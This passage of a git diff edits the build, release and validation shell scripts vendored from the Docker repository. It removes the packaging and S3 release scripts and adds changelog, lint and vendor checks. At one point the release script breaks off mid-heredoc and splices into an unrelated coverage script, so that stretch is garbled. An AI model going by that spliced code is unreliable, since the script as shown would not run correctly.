- # Copy the binary - # This will fail if the binary bundle hasn't been built - mkdir -p "$DIR/usr/bin" - cp "$DEST/../binary/docker-$VERSION" 
"$DIR/usr/bin/docker" - - # Generate postinst/prerm/postrm scripts - cat > "$DEST/postinst" <<'EOF' -#!/bin/sh -set -e -set -u - -if [ "$1" = 'configure' ] && [ -z "$2" ]; then - if ! getent group docker > /dev/null; then - groupadd --system docker - fi -fi - -if ! { [ -x /sbin/initctl ] && /sbin/initctl version 2>/dev/null | grep -q upstart; }; then - # we only need to do this if upstart isn't in charge - update-rc.d docker defaults > /dev/null || true -fi -if [ -n "$2" ]; then - _dh_action=restart -else - _dh_action=start -fi -service docker $_dh_action 2>/dev/null || true - -#DEBHELPER# -EOF - cat > "$DEST/prerm" <<'EOF' -#!/bin/sh -set -e -set -u - -service docker stop 2>/dev/null || true - -#DEBHELPER# -EOF - cat > "$DEST/postrm" <<'EOF' -#!/bin/sh -set -e -set -u - -if [ "$1" = "purge" ] ; then - update-rc.d docker remove > /dev/null || true -fi - -# In case this system is running systemd, we make systemd reload the unit files -# to pick up changes. -if [ -d /run/systemd/system ] ; then - systemctl --system daemon-reload > /dev/null || true -fi - -#DEBHELPER# -EOF - # TODO swaths of these were borrowed from debhelper's auto-inserted stuff, because we're still using fpm - we need to use debhelper instead, and somehow reconcile Ubuntu that way - chmod +x "$DEST/postinst" "$DEST/prerm" "$DEST/postrm" - - ( - # switch directories so we create *.deb in the right folder - cd "$DEST" - - # create lxc-docker-VERSION package - fpm -s dir -C "$DIR" \ - --name "lxc-docker-$VERSION" --version "$PKGVERSION" \ - --after-install "$ABS_DEST/postinst" \ - --before-remove "$ABS_DEST/prerm" \ - --after-remove "$ABS_DEST/postrm" \ - --architecture "$PACKAGE_ARCHITECTURE" \ - --prefix / \ - --depends iptables \ - --deb-recommends aufs-tools \ - --deb-recommends ca-certificates \ - --deb-recommends git \ - --deb-recommends xz-utils \ - --deb-recommends 'cgroupfs-mount | cgroup-lite' \ - --deb-suggests apparmor \ - --description "$PACKAGE_DESCRIPTION" \ - --maintainer 
"$PACKAGE_MAINTAINER" \ - --conflicts docker \ - --conflicts docker.io \ - --conflicts lxc-docker-virtual-package \ - --provides lxc-docker \ - --provides lxc-docker-virtual-package \ - --replaces lxc-docker \ - --replaces lxc-docker-virtual-package \ - --url "$PACKAGE_URL" \ - --license "$PACKAGE_LICENSE" \ - --config-files /etc/udev/rules.d/80-docker.rules \ - --config-files /etc/init/docker.conf \ - --config-files /etc/init.d/docker \ - --config-files /etc/default/docker \ - --deb-compression gz \ - -t deb . - # TODO replace "Suggests: cgroup-lite" with "Recommends: cgroupfs-mount | cgroup-lite" once cgroupfs-mount is available - - # create empty lxc-docker wrapper package - fpm -s empty \ - --name lxc-docker --version "$PKGVERSION" \ - --architecture "$PACKAGE_ARCHITECTURE" \ - --depends lxc-docker-$VERSION \ - --description "$PACKAGE_DESCRIPTION" \ - --maintainer "$PACKAGE_MAINTAINER" \ - --url "$PACKAGE_URL" \ - --license "$PACKAGE_LICENSE" \ - --deb-compression gz \ - -t deb - ) - - # clean up after ourselves so we have a clean output directory - rm "$DEST/postinst" "$DEST/prerm" "$DEST/postrm" - rm -r "$DIR" -} - -bundle_ubuntu diff --git a/vendor/github.com/docker/docker/hack/make/update-apt-repo b/vendor/github.com/docker/docker/hack/make/update-apt-repo deleted file mode 100755 index 7354a2ecff..0000000000 --- a/vendor/github.com/docker/docker/hack/make/update-apt-repo +++ /dev/null @@ -1,70 +0,0 @@ -#!/bin/bash -set -e - -# This script updates the apt repo in $DOCKER_RELEASE_DIR/apt/repo. -# This script is a "fix all" for any sort of problems that might have occurred with -# the Release or Package files in the repo. -# It should only be used in the rare case of extreme emergencies to regenerate -# Release and Package files for the apt repo. -# -# NOTE: Always be sure to re-sign the repo with hack/make/sign-repos after running -# this script. 
- -: ${DOCKER_RELEASE_DIR:=$DEST} -APTDIR=$DOCKER_RELEASE_DIR/apt/repo - -# supported arches/sections -arches=( amd64 i386 ) - -# Preserve existing components but don't add any non-existing ones -for component in main testing experimental ; do - if ls "$APTDIR/dists/*/$component" >/dev/null 2>&1 ; then - components+=( $component ) - fi -done - -dists=( $(find "${APTDIR}/dists" -maxdepth 1 -mindepth 1 -type d) ) - -# override component if it is set -if [ "$COMPONENT" ]; then - components=( $COMPONENT ) -fi - -# release the debs -for version in "${dists[@]}"; do - for component in "${components[@]}"; do - codename="${version//debootstrap-}" - - # update the filelist for this codename/component - find "$APTDIR/pool/$component" \ - -name *~${codename#*-}*.deb > "$APTDIR/dists/$codename/$component/filelist" - done -done - -# run the apt-ftparchive commands so we can have pinning -apt-ftparchive generate "$APTDIR/conf/apt-ftparchive.conf" - -for dist in "${dists[@]}"; do - version=$(basename "$dist") - for component in "${components[@]}"; do - codename="${version//debootstrap-}" - - apt-ftparchive \ - -o "APT::FTPArchive::Release::Codename=$codename" \ - -o "APT::FTPArchive::Release::Suite=$codename" \ - -c "$APTDIR/conf/docker-engine-release.conf" \ - release \ - "$APTDIR/dists/$codename" > "$APTDIR/dists/$codename/Release" - - for arch in "${arches[@]}"; do - apt-ftparchive \ - -o "APT::FTPArchive::Release::Codename=$codename" \ - -o "APT::FTPArchive::Release::Suite=$codename" \ - -o "APT::FTPArchive::Release::Component=$component" \ - -o "APT::FTPArchive::Release::Architecture=$arch" \ - -c "$APTDIR/conf/docker-engine-release.conf" \ - release \ - "$APTDIR/dists/$codename/$component/binary-$arch" > "$APTDIR/dists/$codename/$component/binary-$arch/Release" - done - done -done diff --git a/vendor/github.com/docker/docker/hack/make/win b/vendor/github.com/docker/docker/hack/make/win deleted file mode 100644 index f9f4111276..0000000000 --- 
a/vendor/github.com/docker/docker/hack/make/win +++ /dev/null @@ -1,20 +0,0 @@ -#!/bin/bash -set -e - -# explicit list of os/arch combos that support being a daemon -declare -A daemonSupporting -daemonSupporting=( - [linux/amd64]=1 - [windows/amd64]=1 -) -platform="windows/amd64" -export DEST="$DEST/$platform" # bundles/VERSION/cross/GOOS/GOARCH/docker-VERSION -mkdir -p "$DEST" -ABS_DEST="$(cd "$DEST" && pwd -P)" -export GOOS=${platform%/*} -export GOARCH=${platform##*/} -if [ -z "${daemonSupporting[$platform]}" ]; then - export LDFLAGS_STATIC_DOCKER="" # we just need a simple client for these platforms - export BUILDFLAGS=( "${ORIG_BUILDFLAGS[@]/ daemon/}" ) # remove the "daemon" build tag from platforms that aren't supported -fi -source "${MAKEDIR}/binary" diff --git a/vendor/github.com/docker/docker/hack/release.sh b/vendor/github.com/docker/docker/hack/release.sh deleted file mode 100755 index 4b020537ea..0000000000 --- a/vendor/github.com/docker/docker/hack/release.sh +++ /dev/null @@ -1,325 +0,0 @@ -#!/usr/bin/env bash -set -e - -# This script looks for bundles built by make.sh, and releases them on a -# public S3 bucket. -# -# Bundles should be available for the VERSION string passed as argument. -# -# The correct way to call this script is inside a container built by the -# official Dockerfile at the root of the Docker source code. The Dockerfile, -# make.sh and release.sh should all be from the same source code revision. - -set -o pipefail - -# Print a usage message and exit. -usage() { - cat >&2 <<'EOF' -To run, I need: -- to be in a container generated by the Dockerfile at the top of the Docker - repository; -- to be provided with the location of an S3 bucket and path, in - environment variables AWS_S3_BUCKET and AWS_S3_BUCKET_PATH (default: ''); -- to be provided with AWS credentials for this S3 bucket, in environment - variables AWS_ACCESS_KEY_ID and AWS_SECRET_ACCESS_KEY; -- a generous amount of good will and nice manners. 
-The canonical way to run me is to run the image produced by the Dockerfile: e.g.:" - -docker run -e AWS_S3_BUCKET=test.docker.com \ - -e AWS_ACCESS_KEY_ID \ - -e AWS_SECRET_ACCESS_KEY \ - -e AWS_DEFAULT_REGION \ - -it --privileged \ - docker ./hack/release.sh -EOF - exit 1 -} - -[ "$AWS_S3_BUCKET" ] || usage -[ "$AWS_ACCESS_KEY_ID" ] || usage -[ "$AWS_SECRET_ACCESS_KEY" ] || usage -[ -d /go/src/github.com/docker/docker ] || usage -cd /go/src/github.com/docker/docker -[ -x hack/make.sh ] || usage - -export AWS_DEFAULT_REGION -: ${AWS_DEFAULT_REGION:=us-west-1} - -AWS_CLI=${AWS_CLI:-'aws'} - -RELEASE_BUNDLES=( - binary - cross - tgz -) - -if [ "$1" != '--release-regardless-of-test-failure' ]; then - RELEASE_BUNDLES=( - test-unit - "${RELEASE_BUNDLES[@]}" - test-integration-cli - ) -fi - -VERSION=$(< VERSION) -BUCKET=$AWS_S3_BUCKET -BUCKET_PATH=$BUCKET -[[ -n "$AWS_S3_BUCKET_PATH" ]] && BUCKET_PATH+=/$AWS_S3_BUCKET_PATH - -if command -v git &> /dev/null && git rev-parse &> /dev/null; then - if [ -n "$(git status --porcelain --untracked-files=no)" ]; then - echo "You cannot run the release script on a repo with uncommitted changes" - usage - fi -fi - -# These are the 2 keys we've used to sign the deb's -# release (get.docker.com) -# GPG_KEY="36A1D7869245C8950F966E92D8576A8BA88D21E9" -# test (test.docker.com) -# GPG_KEY="740B314AE3941731B942C66ADF4FD13717AAD7D6" - -setup_s3() { - echo "Setting up S3" - # Try creating the bucket. Ignore errors (it might already exist). - $AWS_CLI s3 mb "s3://$BUCKET" 2>/dev/null || true - # Check access to the bucket. - $AWS_CLI s3 ls "s3://$BUCKET" >/dev/null - # Make the bucket accessible through website endpoints. - $AWS_CLI s3 website --index-document index --error-document error "s3://$BUCKET" -} - -# write_to_s3 uploads the contents of standard input to the specified S3 url. 
-write_to_s3() { - DEST=$1 - F=`mktemp` - cat > "$F" - $AWS_CLI s3 cp --acl public-read --content-type 'text/plain' "$F" "$DEST" - rm -f "$F" -} - -s3_url() { - case "$BUCKET" in - get.docker.com|test.docker.com|experimental.docker.com) - echo "https://$BUCKET_PATH" - ;; - *) - BASE_URL="http://${BUCKET}.s3-website-${AWS_DEFAULT_REGION}.amazonaws.com" - if [[ -n "$AWS_S3_BUCKET_PATH" ]] ; then - echo "$BASE_URL/$AWS_S3_BUCKET_PATH" - else - echo "$BASE_URL" - fi - ;; - esac -} - -build_all() { - echo "Building release" - if ! ./hack/make.sh "${RELEASE_BUNDLES[@]}"; then - echo >&2 - echo >&2 'The build or tests appear to have failed.' - echo >&2 - echo >&2 'You, as the release maintainer, now have a couple options:' - echo >&2 '- delay release and fix issues' - echo >&2 '- delay release and fix issues' - echo >&2 '- did we mention how important this is? issues need fixing :)' - echo >&2 - echo >&2 'As a final LAST RESORT, you (because only you, the release maintainer,' - echo >&2 ' really knows all the hairy problems at hand with the current release' - echo >&2 ' issues) may bypass this checking by running this script again with the' - echo >&2 ' single argument of "--release-regardless-of-test-failure", which will skip' - echo >&2 ' running the test suite, and will only build the binaries and packages. Please' - echo >&2 ' avoid using this if at all possible.' - echo >&2 - echo >&2 'Regardless, we cannot stress enough the scarcity with which this bypass' - echo >&2 ' should be used. If there are release issues, we should always err on the' - echo >&2 ' side of caution.' 
- echo >&2 - exit 1 - fi -} - -upload_release_build() { - src="$1" - dst="$2" - latest="$3" - - echo - echo "Uploading $src" - echo " to $dst" - echo - $AWS_CLI s3 cp --follow-symlinks --acl public-read "$src" "$dst" - if [ "$latest" ]; then - echo - echo "Copying to $latest" - echo - $AWS_CLI s3 cp --acl public-read "$dst" "$latest" - fi - - # get hash files too (see hash_files() in hack/make.sh) - for hashAlgo in md5 sha256; do - if [ -e "$src.$hashAlgo" ]; then - echo - echo "Uploading $src.$hashAlgo" - echo " to $dst.$hashAlgo" - echo - $AWS_CLI s3 cp --follow-symlinks --acl public-read --content-type='text/plain' "$src.$hashAlgo" "$dst.$hashAlgo" - if [ "$latest" ]; then - echo - echo "Copying to $latest.$hashAlgo" - echo - $AWS_CLI s3 cp --acl public-read "$dst.$hashAlgo" "$latest.$hashAlgo" - fi - fi - done -} - -release_build() { - echo "Releasing binaries" - GOOS=$1 - GOARCH=$2 - - binDir=bundles/$VERSION/cross/$GOOS/$GOARCH - tgzDir=bundles/$VERSION/tgz/$GOOS/$GOARCH - binary=docker-$VERSION - zipExt=".tgz" - binaryExt="" - tgz=$binary$zipExt - - latestBase= - if [ -z "$NOLATEST" ]; then - latestBase=docker-latest - fi - - # we need to map our GOOS and GOARCH to uname values - # see https://en.wikipedia.org/wiki/Uname - # ie, GOOS=linux -> "uname -s"=Linux - - s3Os=$GOOS - case "$s3Os" in - darwin) - s3Os=Darwin - ;; - freebsd) - s3Os=FreeBSD - ;; - linux) - s3Os=Linux - ;; - solaris) - echo skipping solaris release - return 0 - ;; - windows) - # this is windows use the .zip and .exe extensions for the files. 
- s3Os=Windows - zipExt=".zip" - binaryExt=".exe" - tgz=$binary$zipExt - binary+=$binaryExt - ;; - *) - echo >&2 "error: can't convert $s3Os to an appropriate value for 'uname -s'" - exit 1 - ;; - esac - - s3Arch=$GOARCH - case "$s3Arch" in - amd64) - s3Arch=x86_64 - ;; - 386) - s3Arch=i386 - ;; - arm) - s3Arch=armel - # someday, we might potentially support multiple GOARM values, in which case we might get armhf here too - ;; - *) - echo >&2 "error: can't convert $s3Arch to an appropriate value for 'uname -m'" - exit 1 - ;; - esac - - s3Dir="s3://$BUCKET_PATH/builds/$s3Os/$s3Arch" - # latest= - latestTgz= - if [ "$latestBase" ]; then - # commented out since we aren't uploading binaries right now. - # latest="$s3Dir/$latestBase$binaryExt" - # we don't include the $binaryExt because we don't want docker.exe.zip - latestTgz="$s3Dir/$latestBase$zipExt" - fi - - if [ ! -f "$tgzDir/$tgz" ]; then - echo >&2 "error: can't find $tgzDir/$tgz - was it packaged properly?" - exit 1 - fi - # disable binary uploads for now. 
Only providing tgz downloads - # upload_release_build "$binDir/$binary" "$s3Dir/$binary" "$latest" - upload_release_build "$tgzDir/$tgz" "$s3Dir/$tgz" "$latestTgz" -} - -# Upload binaries and tgz files to S3 -release_binaries() { - [ "$(find bundles/$VERSION -path "bundles/$VERSION/cross/*/*/docker-$VERSION")" != "" ] || { - echo >&2 './hack/make.sh must be run before release_binaries' - exit 1 - } - - for d in bundles/$VERSION/cross/*/*; do - GOARCH="$(basename "$d")" - GOOS="$(basename "$(dirname "$d")")" - release_build "$GOOS" "$GOARCH" - done - - # TODO create redirect from builds/*/i686 to builds/*/i386 - - cat <> coverage.txt + rm profile.out + fi +done diff --git a/vendor/github.com/docker/docker/hack/validate/.validate b/vendor/github.com/docker/docker/hack/validate/.validate index defa981865..32cb6b6d64 100644 --- a/vendor/github.com/docker/docker/hack/validate/.validate +++ b/vendor/github.com/docker/docker/hack/validate/.validate @@ -1,4 +1,4 @@ -#!/bin/bash +#!/usr/bin/env bash set -e -o pipefail diff --git a/vendor/github.com/docker/docker/hack/validate/all b/vendor/github.com/docker/docker/hack/validate/all index 308af47263..9d95c2d2fd 100755 --- a/vendor/github.com/docker/docker/hack/validate/all +++ b/vendor/github.com/docker/docker/hack/validate/all @@ -1,4 +1,4 @@ -#!/bin/bash +#!/usr/bin/env bash # # Run all validation diff --git a/vendor/github.com/docker/docker/hack/validate/changelog-date-descending b/vendor/github.com/docker/docker/hack/validate/changelog-date-descending new file mode 100755 index 0000000000..b9c3368ca6 --- /dev/null +++ b/vendor/github.com/docker/docker/hack/validate/changelog-date-descending @@ -0,0 +1,12 @@ +#!/usr/bin/env bash + +changelogFile=${1:-CHANGELOG.md} + +if [ ! -r "$changelogFile" ]; then + echo "Unable to read file $changelogFile" >&2 + exit 1 +fi + +grep -e '^## ' "$changelogFile" | awk '{print$3}' | sort -c -r || exit 2 + +echo "Congratulations! Changelog $changelogFile dates are in descending order." 
diff --git a/vendor/github.com/docker/docker/hack/validate/changelog-well-formed b/vendor/github.com/docker/docker/hack/validate/changelog-well-formed new file mode 100755 index 0000000000..6c7ce1a1c0 --- /dev/null +++ b/vendor/github.com/docker/docker/hack/validate/changelog-well-formed @@ -0,0 +1,25 @@ +#!/usr/bin/env bash + +changelogFile=${1:-CHANGELOG.md} + +if [ ! -r "$changelogFile" ]; then + echo "Unable to read file $changelogFile" >&2 + exit 1 +fi + +changelogWellFormed=1 + +# e.g. "## 1.12.3 (2016-10-26)" +VER_LINE_REGEX='^## [0-9]+\.[0-9]+\.[0-9]+(-ce)? \([0-9]+-[0-9]+-[0-9]+\)$' +while read -r line; do + if ! [[ "$line" =~ $VER_LINE_REGEX ]]; then + echo "Malformed changelog $changelogFile line \"$line\"" >&2 + changelogWellFormed=0 + fi +done < <(grep '^## ' $changelogFile) + +if [[ "$changelogWellFormed" == "1" ]]; then + echo "Congratulations! Changelog $changelogFile is well-formed." +else + exit 2 +fi diff --git a/vendor/github.com/docker/docker/hack/validate/compose-bindata b/vendor/github.com/docker/docker/hack/validate/compose-bindata deleted file mode 100755 index f87728259e..0000000000 --- a/vendor/github.com/docker/docker/hack/validate/compose-bindata +++ /dev/null @@ -1,28 +0,0 @@ -#!/bin/bash - -export SCRIPTDIR="$( cd "$( dirname "${BASH_SOURCE[0]}" )" && pwd )" -source "${SCRIPTDIR}/.validate" - -IFS=$'\n' -files=( $(validate_diff --diff-filter=ACMR --name-only -- 'cli/compose/schema/data' || true) ) -unset IFS - -if [ ${#files[@]} -gt 0 ]; then - go generate github.com/docker/docker/cli/compose/schema 2> /dev/null - # Let see if the working directory is clean - diffs="$(git status --porcelain -- cli/compose/schema 2>/dev/null)" - if [ "$diffs" ]; then - { - echo 'The result of `go generate github.com/docker/docker/cli/compose/schema` differs' - echo - echo "$diffs" - echo - echo 'Please run `go generate github.com/docker/docker/cli/compose/schema`' - } >&2 - false - else - echo 'Congratulations! 
cli/compose/schema/bindata.go is up-to-date.' - fi -else - echo 'No cli/compose/schema/data changes in diff.' -fi diff --git a/vendor/github.com/docker/docker/hack/validate/dco b/vendor/github.com/docker/docker/hack/validate/dco index 754ce8faec..f391001601 100755 --- a/vendor/github.com/docker/docker/hack/validate/dco +++ b/vendor/github.com/docker/docker/hack/validate/dco @@ -1,4 +1,4 @@ -#!/bin/bash +#!/usr/bin/env bash export SCRIPTDIR="$( cd "$( dirname "${BASH_SOURCE[0]}" )" && pwd )" source "${SCRIPTDIR}/.validate" diff --git a/vendor/github.com/docker/docker/hack/validate/default b/vendor/github.com/docker/docker/hack/validate/default index 29b96ca9a3..8ec978876d 100755 --- a/vendor/github.com/docker/docker/hack/validate/default +++ b/vendor/github.com/docker/docker/hack/validate/default @@ -1,4 +1,4 @@ -#!/bin/bash +#!/usr/bin/env bash # # Run default validation, exclude vendor because it's slow @@ -6,11 +6,12 @@ export SCRIPTDIR="$( cd "$( dirname "${BASH_SOURCE[0]}" )" && pwd )" . $SCRIPTDIR/dco . $SCRIPTDIR/default-seccomp -. $SCRIPTDIR/gofmt -. $SCRIPTDIR/lint +. $SCRIPTDIR/gometalinter . $SCRIPTDIR/pkg-imports . $SCRIPTDIR/swagger . $SCRIPTDIR/swagger-gen . $SCRIPTDIR/test-imports . $SCRIPTDIR/toml -. $SCRIPTDIR/vet +. $SCRIPTDIR/changelog-well-formed +. $SCRIPTDIR/changelog-date-descending +. 
$SCRIPTDIR/deprecate-integration-cli diff --git a/vendor/github.com/docker/docker/hack/validate/default-seccomp b/vendor/github.com/docker/docker/hack/validate/default-seccomp index 8fe8435618..24cbf00d24 100755 --- a/vendor/github.com/docker/docker/hack/validate/default-seccomp +++ b/vendor/github.com/docker/docker/hack/validate/default-seccomp @@ -1,4 +1,4 @@ -#!/bin/bash +#!/usr/bin/env bash export SCRIPTDIR="$( cd "$( dirname "${BASH_SOURCE[0]}" )" && pwd )" source "${SCRIPTDIR}/.validate" diff --git a/vendor/github.com/docker/docker/hack/validate/deprecate-integration-cli b/vendor/github.com/docker/docker/hack/validate/deprecate-integration-cli new file mode 100755 index 0000000000..da6f8310f4 --- /dev/null +++ b/vendor/github.com/docker/docker/hack/validate/deprecate-integration-cli @@ -0,0 +1,25 @@ +#!/usr/bin/env bash +# Check that no new tests are being added to integration-cli + +export SCRIPTDIR="$( cd "$( dirname "${BASH_SOURCE[0]}" )" && pwd )" +source "${SCRIPTDIR}/.validate" + +new_tests=$( + validate_diff --diff-filter=ACMR --unified=0 -- 'integration-cli/*_cli_*.go' | + grep -E '^\+func (.*) Test' || true +) + +if [ -z "$new_tests" ]; then + echo 'Congratulations! No new tests added to integration-cli.' + exit +fi + +echo "The following new tests were added to integration-cli:" +echo +echo "$new_tests" +echo +echo "integration-cli is deprecated. Please add an API integration test to" +echo "./integration/COMPONENT/. See ./TESTING.md for more details." 
+echo + +exit 1 diff --git a/vendor/github.com/docker/docker/hack/validate/gofmt b/vendor/github.com/docker/docker/hack/validate/gofmt deleted file mode 100755 index 2040afa09e..0000000000 --- a/vendor/github.com/docker/docker/hack/validate/gofmt +++ /dev/null @@ -1,33 +0,0 @@ -#!/bin/bash - -export SCRIPTDIR="$( cd "$( dirname "${BASH_SOURCE[0]}" )" && pwd )" -source "${SCRIPTDIR}/.validate" - -IFS=$'\n' -files=( $(validate_diff --diff-filter=ACMR --name-only -- '*.go' | - grep -v '^vendor/' | - grep -v '^cli/compose/schema/bindata.go' || true) ) -unset IFS - -badFiles=() -for f in "${files[@]}"; do - # we use "git show" here to validate that what's committed is formatted - if [ "$(git show "$VALIDATE_HEAD:$f" | gofmt -s -l)" ]; then - badFiles+=( "$f" ) - fi -done - -if [ ${#badFiles[@]} -eq 0 ]; then - echo 'Congratulations! All Go source files are properly formatted.' -else - { - echo "These files are not properly gofmt'd:" - for f in "${badFiles[@]}"; do - echo " - $f" - done - echo - echo 'Please reformat the above files using "gofmt -s -w" and commit the result.' - echo - } >&2 - false -fi diff --git a/vendor/github.com/docker/docker/hack/validate/gometalinter b/vendor/github.com/docker/docker/hack/validate/gometalinter new file mode 100755 index 0000000000..8f42597fce --- /dev/null +++ b/vendor/github.com/docker/docker/hack/validate/gometalinter @@ -0,0 +1,13 @@ +#!/usr/bin/env bash +set -e -o pipefail + +SCRIPTDIR="$( cd "$( dirname "${BASH_SOURCE[0]}" )" && pwd )" + +# CI platforms differ, so per-platform GOMETALINTER_OPTS can be set +# from a platform-specific Dockerfile, otherwise let's just set +# (somewhat pessimistic) default of 10 minutes. +: ${GOMETALINTER_OPTS=--deadline=10m} + +gometalinter \ + ${GOMETALINTER_OPTS} \ + --config $SCRIPTDIR/gometalinter.json ./... 
diff --git a/vendor/github.com/docker/docker/hack/validate/gometalinter.json b/vendor/github.com/docker/docker/hack/validate/gometalinter.json new file mode 100644 index 0000000000..81eb1017cb --- /dev/null +++ b/vendor/github.com/docker/docker/hack/validate/gometalinter.json @@ -0,0 +1,27 @@ +{ + "Vendor": true, + "EnableGC": true, + "Sort": ["linter", "severity", "path"], + "Exclude": [ + ".*\\.pb\\.go", + "dockerversion/version_autogen.go", + "api/types/container/container_.*", + "api/types/volume/volume_.*", + "integration-cli/" + ], + "Skip": ["integration-cli/"], + + "Enable": [ + "deadcode", + "gofmt", + "goimports", + "golint", + "gosimple", + "ineffassign", + "interfacer", + "unconvert", + "vet" + ], + + "LineLength": 200 +} diff --git a/vendor/github.com/docker/docker/hack/validate/lint b/vendor/github.com/docker/docker/hack/validate/lint deleted file mode 100755 index 4ac0a33b20..0000000000 --- a/vendor/github.com/docker/docker/hack/validate/lint +++ /dev/null @@ -1,31 +0,0 @@ -#!/bin/bash - -export SCRIPTDIR="$( cd "$( dirname "${BASH_SOURCE[0]}" )" && pwd )" -source "${SCRIPTDIR}/.validate" - -IFS=$'\n' -files=( $(validate_diff --diff-filter=ACMR --name-only -- '*.go' | grep -v '^vendor/' | grep -v '^api/types/container/' | grep -v '^cli/compose/schema/bindata.go' || true) ) -unset IFS - -errors=() -for f in "${files[@]}"; do - failedLint=$(golint "$f") - if [ "$failedLint" ]; then - errors+=( "$failedLint" ) - fi -done - -if [ ${#errors[@]} -eq 0 ]; then - echo 'Congratulations! All Go source files have been linted.' -else - { - echo "Errors from golint:" - for err in "${errors[@]}"; do - echo "$err" - done - echo - echo 'Please fix the above errors. You can test via "golint" and commit the result.' 
- echo - } >&2 - false -fi diff --git a/vendor/github.com/docker/docker/hack/validate/pkg-imports b/vendor/github.com/docker/docker/hack/validate/pkg-imports index 9e4ea74da0..a9aab6456f 100755 --- a/vendor/github.com/docker/docker/hack/validate/pkg-imports +++ b/vendor/github.com/docker/docker/hack/validate/pkg-imports @@ -1,4 +1,4 @@ -#!/bin/bash +#!/usr/bin/env bash set -e export SCRIPTDIR="$( cd "$( dirname "${BASH_SOURCE[0]}" )" && pwd )" diff --git a/vendor/github.com/docker/docker/hack/validate/swagger b/vendor/github.com/docker/docker/hack/validate/swagger index e754fb8cb9..0b3c2719d8 100755 --- a/vendor/github.com/docker/docker/hack/validate/swagger +++ b/vendor/github.com/docker/docker/hack/validate/swagger @@ -1,4 +1,4 @@ -#!/bin/bash +#!/usr/bin/env bash set -e export SCRIPTDIR="$( cd "$( dirname "${BASH_SOURCE[0]}" )" && pwd )" source "${SCRIPTDIR}/.validate" diff --git a/vendor/github.com/docker/docker/hack/validate/swagger-gen b/vendor/github.com/docker/docker/hack/validate/swagger-gen index 008abc7e0d..07c22b5a62 100755 --- a/vendor/github.com/docker/docker/hack/validate/swagger-gen +++ b/vendor/github.com/docker/docker/hack/validate/swagger-gen @@ -1,4 +1,4 @@ -#!/bin/bash +#!/usr/bin/env bash export SCRIPTDIR="$( cd "$( dirname "${BASH_SOURCE[0]}" )" && pwd )" source "${SCRIPTDIR}/.validate" @@ -10,7 +10,7 @@ unset IFS if [ ${#files[@]} -gt 0 ]; then ${SCRIPTDIR}/../generate-swagger-api.sh 2> /dev/null # Let see if the working directory is clean - diffs="$(git status --porcelain -- api/types/ 2>/dev/null)" + diffs="$(git diff -- api/types/)" if [ "$diffs" ]; then { echo 'The result of hack/generate-swagger-api.sh differs' diff --git a/vendor/github.com/docker/docker/hack/validate/test-imports b/vendor/github.com/docker/docker/hack/validate/test-imports index 373caa2f29..0e836a31c0 100755 --- a/vendor/github.com/docker/docker/hack/validate/test-imports +++ b/vendor/github.com/docker/docker/hack/validate/test-imports @@ -1,4 +1,4 @@ -#!/bin/bash 
+#!/usr/bin/env bash # Make sure we're not using gos' Testing package any more in integration-cli export SCRIPTDIR="$( cd "$( dirname "${BASH_SOURCE[0]}" )" && pwd )" diff --git a/vendor/github.com/docker/docker/hack/validate/toml b/vendor/github.com/docker/docker/hack/validate/toml index a0cb158dbd..d5b2ce1c29 100755 --- a/vendor/github.com/docker/docker/hack/validate/toml +++ b/vendor/github.com/docker/docker/hack/validate/toml @@ -1,4 +1,4 @@ -#!/bin/bash +#!/usr/bin/env bash export SCRIPTDIR="$( cd "$( dirname "${BASH_SOURCE[0]}" )" && pwd )" source "${SCRIPTDIR}/.validate" diff --git a/vendor/github.com/docker/docker/hack/validate/vendor b/vendor/github.com/docker/docker/hack/validate/vendor index 0cb5aabdfa..7d753dfb6d 100755 --- a/vendor/github.com/docker/docker/hack/validate/vendor +++ b/vendor/github.com/docker/docker/hack/validate/vendor @@ -1,30 +1,55 @@ -#!/bin/bash +#!/usr/bin/env bash export SCRIPTDIR="$( cd "$( dirname "${BASH_SOURCE[0]}" )" && pwd )" source "${SCRIPTDIR}/.validate" -IFS=$'\n' -files=( $(validate_diff --diff-filter=ACMR --name-only -- 'vendor.conf' 'vendor/' || true) ) -unset IFS +validate_vendor_diff(){ + IFS=$'\n' + files=( $(validate_diff --diff-filter=ACMR --name-only -- 'vendor.conf' 'vendor/' || true) ) + unset IFS -if [ ${#files[@]} -gt 0 ]; then - # We run vndr to and see if we have a diff afterwards - vndr - # Let see if the working directory is clean - diffs="$(git status --porcelain -- vendor 2>/dev/null)" - if [ "$diffs" ]; then - { - echo 'The result of vndr differs' - echo - echo "$diffs" - echo - echo 'Please vendor your package with github.com/LK4D4/vndr.' - echo - } >&2 - false + if [ ${#files[@]} -gt 0 ]; then + # Remove vendor/ first so that anything not included in vendor.conf will + # cause the validation to fail. archive/tar is a special case, see vendor.conf + # for details. 
+ ls -d vendor/* | grep -v vendor/archive | xargs rm -rf + # run vndr to recreate vendor/ + vndr + # check if any files have changed + diffs="$(git status --porcelain -- vendor 2>/dev/null)" + if [ "$diffs" ]; then + { + echo 'The result of vndr differs' + echo + echo "$diffs" + echo + echo 'Please vendor your package with github.com/LK4D4/vndr.' + echo + } >&2 + false + else + echo 'Congratulations! All vendoring changes are done the right way.' + fi else - echo 'Congratulations! All vendoring changes are done the right way.' + echo 'No vendor changes in diff.' fi -else - echo 'No vendor changes in diff.' -fi +} + +# 1. make sure all the vendored packages are used +# 2. make sure all the packages contain license information (just warning, because it can cause false-positive) +validate_vendor_used() { + pkgs=$(mawk '/^[a-zA-Z0-9]/ { print $1 }' < vendor.conf) + for f in $pkgs; do + if ls -d vendor/$f > /dev/null 2>&1; then + found=$(find vendor/$f -iregex '.*LICENSE.*' -or -iregex '.*COPYRIGHT.*' -or -iregex '.*COPYING.*' | wc -l) + if [ $found -eq 0 ]; then + echo "WARNING: could not find copyright information for $f" + fi + else + echo "WARNING: $f is vendored but unused" + fi + done +} + +validate_vendor_diff +validate_vendor_used diff --git a/vendor/github.com/docker/docker/hack/validate/vet b/vendor/github.com/docker/docker/hack/validate/vet deleted file mode 100755 index 64760489ea..0000000000 --- a/vendor/github.com/docker/docker/hack/validate/vet +++ /dev/null @@ -1,32 +0,0 @@ -#!/bin/bash - -export SCRIPTDIR="$( cd "$( dirname "${BASH_SOURCE[0]}" )" && pwd )" -source "${SCRIPTDIR}/.validate" - -IFS=$'\n' -files=( $(validate_diff --diff-filter=ACMR --name-only -- '*.go' | grep -v '^vendor/' | grep -v '^api/types/container/' || true) ) -unset IFS - -errors=() -for f in "${files[@]}"; do - failedVet=$(go vet "$f") - if [ "$failedVet" ]; then - errors+=( "$failedVet" ) - fi -done - - -if [ ${#errors[@]} -eq 0 ]; then - echo 'Congratulations! 
